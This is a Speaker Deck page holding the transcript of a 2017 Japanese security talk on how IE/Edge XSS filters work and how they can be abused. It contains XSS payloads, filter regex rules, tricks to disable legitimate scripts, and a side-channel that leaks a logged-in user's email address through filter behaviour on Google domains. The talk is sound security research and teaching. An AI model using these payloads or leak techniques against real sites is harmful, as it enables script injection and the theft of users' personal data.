Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
Masato Kinugawa
March 31, 2017
Technology
7
2.4k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
Masato Kinugawa
March 31, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.5k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
78k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
16k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
18k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.5k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
23k
USAGE OF XSS FILTER
masatokinugawa
4
2.3k
XSS Attacks through PATH
masatokinugawa
8
16k
Other Decks in Technology
See All in Technology
Steps toward self-service operations in eureka
fukubaka0825
0
730
LINE WORKS API 2.0について
mmclsntr
0
120
[SRE NEXT 2022]メルカリグループにおけるSREs
srenext
0
280
srenext2022-skaru
mixi_engineers
PRO
1
730
Oracle Content Management サービス概要 (2022年5月版)
oracle4engineer
PRO
0
120
SRE_チーム立ち上げから1年_気づいたら_SRE_っぽくない仕事まで貢献しちゃってる説
bitkey
PRO
0
2.3k
暗号資産ウォレット入門(MetaMaskの入門~NFTの購入~詐欺の注意事項など)
kayato
2
210
エンタープライズにおけるSRE立ち上げとNew Relic選定に至った背景とは / SRE Startup and New Relic in the Enterprise
tomoyakitaura
2
160
プルリク作ったらデプロイされる仕組み on ECS / SRE NEXT 2022
carta_engineering
1
360
GitHub Actionsを使用してGoogle Play Consoleに自動アップロード
takenaga7
0
200
信頼性の階層の一段目を積み上げる/Monitoring Dashboard
shonansurvivors
0
180
Devに力を授けたいSREのあゆみ / SRE that wants to empower developers
tocyuki
3
480
Featured
See All Featured
Navigating Team Friction
lara
175
11k
Practical Orchestrator
shlominoach
178
8.6k
The Power of CSS Pseudo Elements
geoffreycrofte
46
3.9k
What’s in a name? Adding method to the madness
productmarketing
11
1.5k
How to name files
jennybc
39
59k
Git: the NoSQL Database
bkeepers
PRO
415
59k
Web Components: a chance to create the future
zenorocha
303
40k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
12
890
Product Roadmaps are Hard
iamctodd
34
6.1k
Done Done
chrislema
174
14k
The Invisible Customer
myddelton
110
11k
4 Signs Your Business is Dying
shpigford
169
20k
Transcript
None
None
❶ ➌ ❷ ❹
None
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
None
None
None
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">
None
<input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
<input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701
<title><script> - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>
<script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }
</script> https://example.com/?<script src=//example.jp/jquery.js></script>
None
{<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>
"><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"
None
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:
?q=";document.body.innerHTML="<xss>
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>
URL: ?"/++.+++=
"style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:
<script src="//example^co.jp/test.js" type="text/javascript"> </script>
window#name//Syntax Error window^name//Syntax OK <script> window.name
None
url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }
https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from
an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>
https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
None
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //
// }else{ // } <script>…</script>
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:
SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br
google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
✨ ✨ ✨
{<a.*?hr{e}f}
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref
0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>
5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
<div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔ ✔ ✔ ✔
<div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb">
https://www.google.co.jp/?"-------@gmail.com--div--div-class= https://www.google.co.jp/?"--------@gmail.com--div--div-class= https://www.google.co.jp/?"---------@gmail.com--div--div-class= https://www.google.co.jp/?"----------@gmail.com--div--div-class= https://www.google.co.jp/?"-----------@gmail.com--div--div-class= https://www.google.co.jp/?"------------@gmail.com--div--div-class= https://www.google.co.jp/?"-------------@gmail.com--div--div-class= https://www.google.co.jp/?"--------------@gmail.com--div--div-class= https://www.google.co.jp/?"---------------@gmail.com--div--div-class=
https://www.google.de/?"-a-------------@gmail.com--div--div-class= https://www.google.de/?"-b-------------@gmail.com--div--div-class= https://www.google.de/?"-c-------------@gmail.com--div--div-class= https://www.google.de/?"-d-------------@gmail.com--div--div-class= https://www.google.de/?"-e-------------@gmail.com--div--div-class= https://www.google.de/?"-f-------------@gmail.com--div--div-class= https://www.google.de/?"-g-------------@gmail.com--div--div-class= https://www.google.de/?"-h-------------@gmail.com--div--div-class= https://www.google.de/?"-i-------------@gmail.com--div--div-class= https://www.google.ru/?"-j-------------@gmail.com--div--div-class=
https://www.google.ru/?"-k-------------@gmail.com--div--div-class=
https://www.google.ru/?"-l-------------@gmail.com--div--div-class= https://www.google.ru/?"-m-------------@gmail.com--div--div-class= https://www.google.ru/?"-ma------------@gmail.com--div--div-class= https://www.google.ru/?"-maa-----------@gmail.com--div--div-class= https://www.google.ru/?"-mab-----------@gmail.com--div--div-class= https://www.google.ru/?"-mac-----------@gmail.com--div--div-class= https://www.google.ru/?"-mad-----------@gmail.com--div--div-class= https://www.google.ca/?"-mae-----------@gmail.com--div--div-class= ...
✨ ✨ ✨
None
None
None
None
None